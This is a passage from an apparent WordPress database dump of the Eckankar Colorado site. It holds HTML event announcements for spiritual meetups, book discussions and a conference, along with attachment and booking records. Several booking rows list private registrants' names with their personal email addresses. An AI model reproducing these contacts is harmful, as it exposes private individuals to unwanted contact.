17:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267395',0,'mec-books','',0),(267401,0,'2022-10-30 10:17:54','2022-10-30 16:17:54','','','','publish','closed','closed','','267401','','','2022-10-30 10:17:54','2022-10-30 16:17:54','',0,'https://eckankar-colorado.org/nf_sub/267401/',0,'nf_sub','',0),(267406,1000051,'2022-11-06 10:30:00','2022-11-06 17:30:00','','Alberto Ruiz - rumipaz@gmail.com','','publish','closed','closed','','alberto-ruiz-rumipazgmail-com','','','2022-11-06 10:30:00','2022-11-06 17:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267406',0,'mec-books','',0),(267408,2,'2022-11-02 09:37:27','2022-11-02 15:37:27','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<div class=\"break-words\">\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 16pt;\">Are you looking for answers, guidance and protection?</span></strong><br>\r\n<strong><span style=\"font-size: 16pt;\">Do you want to ignite your own creativity to solve problems?</span></strong><br>\r\n<strong><span style=\"font-size: 16pt;\">Are you ready to tune into your true self?</span></strong></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you answered yes to any of these questions, this service is for you. Help can come as a nudge, a dream, a vision, or a quiet voice within you. You will learn new ways to connect with the ever-present guidance of the Holy Spirit.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Harold Klemp says in his Book ECK Wisdom on Inner Guidance, “God is always speaking to us and all life through the Holy Spirit. Listen to God’s Voice. Respond to It spiritually and know that, despite every appearance to the contrary, all is well and in its rightful place.”</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU chant, a love song to God, and be able to speak with other like-hearted spiritual seekers in a low-key, no pressure setting. Please come and explore your own answers with open hearts, eyes and ears.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Welcome to All.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><em><strong>The ECK Light &amp; Sound Service will be held in person at the ECK Temple of Colorado, 7100 West Mississippi Avenue in Lakewood Colorado and will be broadcast live simultaneously on Zoom.</strong></em></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n</div>\r\n<p class=\"\"><strong><span style=\"font-size: 16pt; color: #1d5791;\">For those who cannot attend in person, you are welcome to attend online.<br>\r\nPlease register to get the Zoom login information. Hope to see you there!</span></strong></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','ECK Light and Sound Service - In Person & Online<br>\'Inner Guidance & Soul\'s Journey\'','','publish','closed','closed','','eck-light-and-sound-service-in-person-onlineinner-guidance-souls-journey','','','2022-11-02 09:37:27','2022-11-02 15:37:27','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267408',0,'mec-events','',0),(267409,2,'2022-11-02 09:30:13','2022-11-02 15:30:13','','hilltop-walking-1','','inherit','closed','closed','','hilltop-walking-1','','','2022-11-02 09:30:13','2022-11-02 15:30:13','',267408,'https://eckankar-colorado.org/wp-content/uploads/2022/11/hilltop-walking-1.jpg',0,'attachment','image/jpeg',0),(267414,0,'2022-11-05 13:42:09','2022-11-05 19:42:09','','','','publish','closed','closed','','267414','','','2022-11-05 13:42:09','2022-11-05 19:42:09','',0,'https://eckankar-colorado.org/nf_sub/267414/',0,'nf_sub','',0),(267415,1000043,'2022-11-06 10:30:00','2022-11-06 17:30:00','','Gordon - huusinger@comcast.net','','publish','closed','closed','','gordon-huusingercomcast-net','','','2022-11-06 10:30:00','2022-11-06 17:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267415',0,'mec-books','',0),(267417,1000052,'2022-11-06 10:30:00','2022-11-06 17:30:00','','Raelin - Raelinharp@yahoo.com','','publish','closed','closed','','raelin-raelinharpyahoo-com','','','2022-11-06 10:30:00','2022-11-06 17:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267417',0,'mec-books','',0),(267419,1000050,'2022-11-13 10:30:00','2022-11-13 17:30:00','','Sandy(Tarzana/Encino California) - sandykarlic@gmail.com','','publish','closed','closed','','sandytarzana-encino-california-sandykarlicgmail-com','','','2022-11-13 10:30:00','2022-11-13 17:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267419',0,'mec-books','',0),(267433,2,'2022-11-09 22:18:42','2022-11-10 05:18:42','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><strong>-This Book Discussion Is Open To The Public-</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">In person at the ECK Temple of Colorado with a simultaneous live Zoom broadcast. This allows you to attend both the Roundtables and the class at the Temple.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><strong>NOTE:</strong> For this month\'s class, the reading assignment will be Chapter 9, “Teacher at a Golden Wisdom Temple on Venus: RAMI NURI.”</span></p>\r\n<p class=\"\" style=\"font-size: 14px; border-width: 0px;\"><span style=\"font-size: 14pt;\">Would you like to have personal experience with spiritual masters? Join us as we discuss this book by Sri Harold Klemp that welcomes you to the world of ECK Masters. The stories and insights in these pages can help you to recognize the presence, divine love, and guidance of these wonderful Co-workers with God. This book features profiles of eleven ECK Masters along with their portraits and spiritual exercises designed to help you meet them.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This discussion will take place <strong>every 4th Sunday</strong> and will run from May 2022 to April 2023.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The book is available at <a href=\"https://eckankar-colorado.bmetrack.com/c/l?u=DC3EFAA&amp;e=1442BF5&amp;c=86639&amp;t=0&amp;l=2D3AFE3B&amp;email=CJTv004iwsr5se29YF4UI1NnZqARidYv&amp;seq=1\" target=\"_blank\" rel=\"noopener\">EckBooks</a>, and through many online bookstores like <a href=\"https://www.amazon.com/Those-Wonderful-Masters-Harold-Klemp/dp/1570432171\" target=\"_blank\" rel=\"noopener\">Amazon</a>.<br>\r\n<br>\r\n</span></p>\r\n<p class=\"\"><span style=\"color: #23507d;\"><strong><span style=\"font-size: 14pt;\">If you can not attend in person, please register below for online login information.</span></strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','\'Those Wonderful ECK Masters\'<br>Book Discussion - In Person and Online','','publish','closed','closed','','book-discussion-in-person-and-onlinethose-wonderful-eck-masters','','','2023-02-17 12:33:30','2023-02-17 19:33:30','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267433',0,'mec-events','',0),(267435,0,'2022-11-10 12:13:32','2022-11-10 19:13:32','','','','publish','closed','closed','','267435','','','2022-11-10 12:13:32','2022-11-10 19:13:32','',0,'https://eckankar-colorado.org/nf_sub/267435/',0,'nf_sub','',0),(267439,0,'2022-11-11 13:37:03','2022-11-11 20:37:03','','','','publish','closed','closed','','267439','','','2022-11-11 13:37:03','2022-11-11 20:37:03','',0,'https://eckankar-colorado.org/nf_sub/267439/',0,'nf_sub','',0),(267440,1000053,'2022-11-13 10:30:00','2022-11-13 17:30:00','','Roger Freed - inyear25252002@yahoo.com','','publish','closed','closed','','roger-freed-inyear25252002yahoo-com','','','2022-11-13 10:30:00','2022-11-13 17:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267440',0,'mec-books','',0),(267447,2,'2022-11-12 09:56:00','2022-11-12 16:56:00','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 16pt;\"><strong>– This Discussion Is Available To Members Of Eckankar-</strong></span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">Ready to be a wiser, happier Soul?</span></strong><br>\r\n<strong><span style=\"font-size: 16pt;\">Turn your stumbling blocks into stepping-stones?</span></strong><br>\r\n<strong><span style=\"font-size: 16pt;\">Your dreams into gems of wisdom?<br>\r\nYour goals into joyful, productive living?</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The <em>Wisdom Notes</em> are written heart-to-heart, Soul-to-Soul. They are letters Sri Harold Klemp writes as the Living ECK Master to the ECK chelas. Over the years, they have appeared regularly in the Mystic World, a quarterly newsletter for members of Eckankar.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">If you read these letters carefully, highlighting the passages that speak to your heart, you may notice the effect of their rhythm on your life.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The <em>Wisdom Notes</em> can bring important insights and show you ways to navigate the rough spots on your own spiritual journey.</span></p>\r\n<p class=\"\">&nbsp;</p>\r\n<div class=\"\"><span class=\"\" style=\"font-size: 12pt;\"><strong><span class=\"\">COVID-19 Safety Measures</span></strong></span></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 12pt;\"><em><span class=\"\">*** Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</span></em></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','\'Wisdom Notes Discussion\'<br>In Person','','publish','closed','closed','','in-personwisdom-notes-discussion','','','2023-01-15 09:44:32','2023-01-15 16:44:32','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267447',0,'mec-events','',0),(267449,2,'2022-11-12 10:47:16','2022-11-12 17:47:16','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<blockquote class=\"bg-blockquote border\" style=\"margin-top: -15px; margin-left: 20px; border-style: solid; border-width: 0px 0px 0px 4px; border-color: #de752a;\">\r\n<p><span style=\"color: #666666; font-size: 14pt;\">“The most important point of all is that you are Soul. Know that you are a spark of God and can exist fully only within the realization of that profound truth. As such, you are a light and inspiration to others.</span><span style=\"color: #666666; font-size: 14pt;\">\"</span></p>\r\n<p><span style=\"font-size: 12pt; color: #666666;\">— Sri Harold Klemp, the Mᴀʜᴀɴᴛᴀ,the Living ECK Master<br>\r\n</span></p>\r\n</blockquote>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">Watch Sri Harold Klemp’s Saturday evening talk at the 2022 ECK Soul Adventure Seminar, which was held October 21 - 23 in Minneapolis, Minnesota.</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">In his talks and writings, Harold Klemp\'s sense of humor and practical approach to spirituality have helped many people around the world find truth in their lives and greater inner freedom, wisdom, and love. <br>\r\n</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><strong>COVID-19 Safety Measures</strong></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 11pt;\"><strong>***</strong><em> Since contracting COVID-19 may still be possible, please take the health steps you consider best. It’s appreciated that by attending you are taking responsibility for your own health.</em></span></div>\r\n</div>\r\n</div>\r\n</div>','Video Rebroadcast - In Person<br>\'Sri Harold Klemp at the 2022 ECK Soul Adventure Seminar\'','','publish','closed','closed','','video-rebroadcast-in-personsri-harold-klemp-at-the-2022-eck-soul-adventure-seminar-2','','','2022-11-12 11:02:29','2022-11-12 18:02:29','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267449',0,'mec-events','',0),(267451,1000054,'2022-11-13 10:30:00','2022-11-13 17:30:00','','Roger Freed - freedroger9@gmail.com','','publish','closed','closed','','roger-freed-freedroger9gmail-com','','','2022-11-13 10:30:00','2022-11-13 17:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267451',0,'mec-books','',0),(269340,2,'2023-11-04 08:43:10','2023-11-04 14:43:10','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Find Your Own Proof the Easy Way<br>\r\n</span></strong></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>You came into this life to spread your wings and live in freedom – heart, mind, and Soul. This in-person discussion will introduce keys to embrace the highest expression of who you really are.</strong></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Would you like to learn how to go beyond your present state of consciousness, by examining yourself honestly – not with the mind, but with the faculties of Soul?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Would you like to learn more about the two aspects of the creative imagination – mental and spiritual, and how they can bring greater spiritual blessings into your life?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Would you like to learn how small daily experiences hold the keys to understanding spiritual experiences?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you answered yes to any of these questions, then this Meetup is for you. Techniques will be shared to help you learn how to have more of God’s love and guidance in your life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">All our welcome to join us.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by ECKANKAR as a community service, is a spiritual resource for people of all faiths and beliefs. ECKANKAR is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore your own unique relationship with the Divine.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-parker/events/297109965/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Explore the Reality of Spiritual Experiences','','publish','closed','closed','','past-lives-dreams-and-soul-travel-703','','','2023-11-04 08:43:10','2023-11-04 14:43:10','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=269340',0,'mec-events','',0),(269226,0,'2023-10-18 18:02:51','2023-10-19 00:02:51','','','','publish','closed','closed','','269226','','','2023-10-18 18:02:51','2023-10-19 00:02:51','',0,'https://eckankar-colorado.org/nf_sub/269226/',0,'nf_sub','',0),(269227,0,'2023-10-18 18:30:37','2023-10-19 00:30:37','','','','publish','closed','closed','','269227','','','2023-10-18 18:30:37','2023-10-19 00:30:37','',0,'https://eckankar-colorado.org/nf_sub/269227/',0,'nf_sub','',0),(269228,0,'2023-10-18 18:32:56','2023-10-19 00:32:56','','','','publish','closed','closed','','269228','','','2023-10-18 18:32:56','2023-10-19 00:32:56','',0,'https://eckankar-colorado.org/nf_sub/269228/',0,'nf_sub','',0),(269229,0,'2023-10-19 06:55:38','2023-10-19 12:55:38','','','','publish','closed','closed','','269229','','','2023-10-19 06:55:38','2023-10-19 12:55:38','',0,'https://eckankar-colorado.org/nf_sub/269229/',0,'nf_sub','',0),(269230,2,'2023-10-20 09:26:49','2023-10-20 15:26:49','','tree-path-5','','inherit','closed','closed','','tree-path-5','','','2023-10-20 09:26:49','2023-10-20 15:26:49','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/10/tree-path-5.jpg',0,'attachment','image/jpeg',0),(269231,2,'2023-10-20 09:27:09','2023-10-20 15:27:09','','sunset-gold-ocean-eagle-7','','inherit','closed','closed','','sunset-gold-ocean-eagle-7','','','2023-10-20 09:27:09','2023-10-20 15:27:09','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/10/sunset-gold-ocean-eagle-7.jpg',0,'attachment','image/jpeg',0),(267457,2,'2022-11-17 14:02:20','2022-11-17 21:02:20','','2022-ONLINE-oct souladv promo-2','','inherit','closed','closed','','2022-online-oct-souladv-promo-2','','','2022-11-17 14:02:20','2022-11-17 21:02:20','',0,'https://eckankar-colorado.org/wp-content/uploads/2022/11/2022-ONLINE-oct-souladv-promo-2.jpg',0,'attachment','image/jpeg',0),(267478,2,'2023-01-15 11:05:20','2023-01-15 18:05:20','<div class=\"boldgrid-section bg-background-color color1-background-color color-1-text-contrast\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 16px; border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/waterfall-6-notxt-Final.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/waterfall-6-notxt-Final.jpg\">\r\n<div class=\"col-lg-7 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; border-radius: 12px; padding-top: 1em; padding-bottom: 0em;\" data-alpha=\"0.38\">\r\n<div style=\"border-width: 0px;\" class=\"\">\r\n<h2 class=\"\" style=\"text-transform: capitalize; font-size: 26px; border-width: 0px; font-family: Montserrat; font-weight: 400; margin-top: 0px; margin-bottom: -12px; color: #585858;\" data-font-style=\"\" data-font-family=\"Montserrat\" data-font-weight=\"400\"><strong>2023 Colorado/Utah<br>\r\n</strong></h2>\r\n<h2 class=\"\" style=\"border-width: 0px; text-transform: capitalize; font-family: Raleway; font-weight: 400; font-size: 38px; color: #006f8e;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"400\"><strong>High Initiate Conference</strong></h2>\r\n<h2 class=\"\" style=\"text-transform: capitalize; font-size: 26px; border-width: 0px; font-family: Montserrat; font-weight: 400; margin-top: 9px; color: #585858; line-height: 24px;\" data-font-style=\"\" data-font-family=\"Montserrat\" data-font-weight=\"400\"><strong>Friday April 7 – Saturday April 8</strong></h2>\r\n<h2 class=\"\" style=\"text-transform: capitalize; font-size: 19px; border-width: 0px; font-family: \'Open Sans\'; font-weight: 500; letter-spacing: -0.3px; margin-top: 11px; color: #585858; margin-bottom: 12px; line-height: 19px;\" data-font-style=\"\" data-font-family=\"Open Sans\" data-font-weight=\"500\">ECK Temple of Colorado | 7100 W. Mississippi Avenue Lakewood, CO</h2>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 20px; color: #23507d; font-family: \'Open Sans\'; font-weight: bold; line-height: 32px; margin-top: 0px; padding: 1% 0% 0%;\" data-font-family=\"Open Sans\" data-font-weight=\"700\" data-font-style=\"\">Click the \'Register\' link below - Then enter the H.I. password&nbsp;</p>\r\n<blockquote class=\"\" style=\"border-style: solid; border-width: 0px 0px 0px 7px; border-color: #006f8e; border-radius: 13px; margin-top: -5px; color: #cd8a0e;\">\r\n<p class=\"\" style=\"border-width: 0px; font-size: 19px; line-height: 30px; font-family: \'Open Sans\'; font-weight: 600; margin-left: -9px; color: #9a6503;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The password is found in the December 2022 \'Golden Leaf\'<br>\r\nIt is the first word under the front page image of the Mahanta<br>\r\n(Enter in lowercase letters).</p>\r\n</blockquote>\r\n<p class=\"\" style=\"border-width: 0px; margin-left: 20px;\"><a class=\"wx-button whitelink\" style=\"background: #006f8e; color: white; padding: 10px 20px; text-decoration: none; font-weight: 500; border-width: 0px; font-size: 20px; font-family: \'Open Sans\'; border-radius: 5px;\" href=\"https://eckankarcolorado.regfox.com/2023-high-initiate-conference\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">Register Online Now!</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 13px; padding-left: 20px; font-size: 20px;\"><a class=\"\" style=\"border-width: 0px;\" href=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/HI-Conf-Registration-Form-10-Feb-23.pdf\"><i class=\"fa bg-inserted-icon fa-envelope-open-o\" style=\"font-size: 25px; border-width: 0px; color: #006f8e;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span>&nbsp; </i>Or Register By Mail</a> &nbsp;&nbsp;&nbsp;&nbsp; <i class=\"fa bg-inserted-icon fa-check-square-o\" style=\"font-size: 25px; border-width: 0px; color: #006f8e;\" aria-hidden=\"true\"> <span style=\"display: none;\">&nbsp;</span> </i><a href=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/HI-Conf-Overview-FINAL-2-14-23.pdf\">Event Overview</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','2023 - HI Conference - Registration Promo-Final','','publish','closed','closed','','2023-hi-conference-save-the-date-promo','','','2023-02-25 09:22:25','2023-02-25 16:22:25','',0,'https://eckankar-colorado.org/?post_type=bg_block&#038;p=267478',0,'bg_block','',0),(267504,2,'2022-11-18 13:52:09','2022-11-18 20:52:09','','golden leaf-3','','inherit','closed','closed','','golden-leaf-3','','','2022-11-18 13:52:09','2022-11-18 20:52:09','',0,'https://eckankar-colorado.org/wp-content/uploads/2022/11/golden-leaf-3.png',0,'attachment','image/png',0),(267511,15,'2022-11-19 08:22:17','2022-11-19 15:22:17','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are warmly invited to experience HU, a divine sound that courses through all of life and through every atom of your body. HU is an ancient name for God, a sacred sound and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">In this event, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<ul class=\"\" style=\"list-style-type: circle;\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The event will include singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, followed by discussion groups, where you can participate in spiritual conversation with others of like heart.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Find out more about HU at&nbsp;<a class=\"text-viridian\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><br>\r\n</span><a class=\"meetupreg\" href=\"https://www.meetup.com/segofdenver/events/289814787/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong>&nbsp;<em>We are following the current Jefferson County guidelines for all in person events at the Colorado ECK Temple in Lakewood, CO. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Experience HU, The Sound of Soul - In Person','','publish','closed','closed','','experience-hu-the-sound-of-soul-in-person-6','','','2022-11-19 08:22:17','2022-11-19 15:22:17','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267511',0,'mec-events','',0),(267512,0,'2022-11-19 08:20:22','2022-11-19 15:20:22','','','','publish','closed','closed','','267512','','','2022-11-19 08:20:22','2022-11-19 15:20:22','',0,'https://eckankar-colorado.org/nf_sub/267512/',0,'nf_sub','',0),(267513,15,'2022-11-19 08:28:30','2022-11-19 15:28:30','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Do you want to experience a greater love in your life?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Through giving mutual respect and goodwill, we can give to each other as Soul, the ability to recognize the uniqueness of the other person as a spark of God. Herein, lies the key to love. Love builds bridges.</span><br>\r\n<span style=\"font-size: 14pt;\">Soul exists because God loves It. Soul equals Soul; no one Soul is greater than another.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Welcome to All.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Please come and explore your own answers with open hearts, eyes and ears.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofdenver/events/289813624/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Meetup - Online<br>Love, the Keystone of Life Discussion','','publish','closed','closed','','meetup-onlinelove-the-keystone-of-life-discussion','','','2022-11-19 08:28:30','2022-11-19 15:28:30','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267513',0,'mec-events','',0),(267514,15,'2022-11-19 08:40:13','2022-11-19 15:40:13','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Join other spiritual adventurers and explore new ways to work with past lives and karma. You may find that all of our relationships offer opportunities to grow spiritually and learn about divine love.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">All are welcome – family and friends – so come join the discussion and share experiences, insights, spiritual practices and tips.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">“Sometimes there is a strong bond between people and their pets, or a bond with certain other people. And we wonder, Why such a strong bond? Often the answer lies in a past life”&nbsp;</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Harold Klemp, <em>The Secret of Love Mahanta Transcripts, Book 14</em>, p. 199.</span></p>\r\n</blockquote>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures</strong></span></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 12pt;\"><strong>**</strong><em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofdenver/events/289814773/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Unlocking the Mystery of Karma and Reincarnation<br>Meetup - In Person','','publish','closed','closed','','meetup-in-personunlocking-the-mystery-of-karma-and-reincarnation','','','2023-01-15 09:43:07','2023-01-15 16:43:07','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267514',0,'mec-events','',0),(267515,15,'2022-11-19 08:46:47','2022-11-19 15:46:47','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Join us for an uplifting conversation where we’ll explore</span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">How to find tools to help you unlock the spiritual resources that are already inside you.</span></li>\r\n	<li><span style=\"font-size: 14pt;\">What it means to have a spiritual experience</span></li>\r\n	<li><span style=\"font-size: 14pt;\">How to find deeper meaning in your dreams</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Dreams, intuition and a deep sense of inner connection with a spiritual guiding presence can be of immense value when confronted with an uncertain future. Have you experienced them?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">These promptings come from a higher source than our mind or emotions, and we can learn to access this spiritual presence and awareness that’s already inside us.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">As you come to accept this spiritual connection and learn to understand its messages better you are raising your spiritual IQ!</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">All are welcome – family and friends – so come join the discussion and share experiences, insights, spiritual practices and tips.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">“As one develops the inner link with Divine Spirit, one’s ability to take charge of his own life increases.” —Harold Klemp,&nbsp;<em>The Spiritual Life</em>, p. 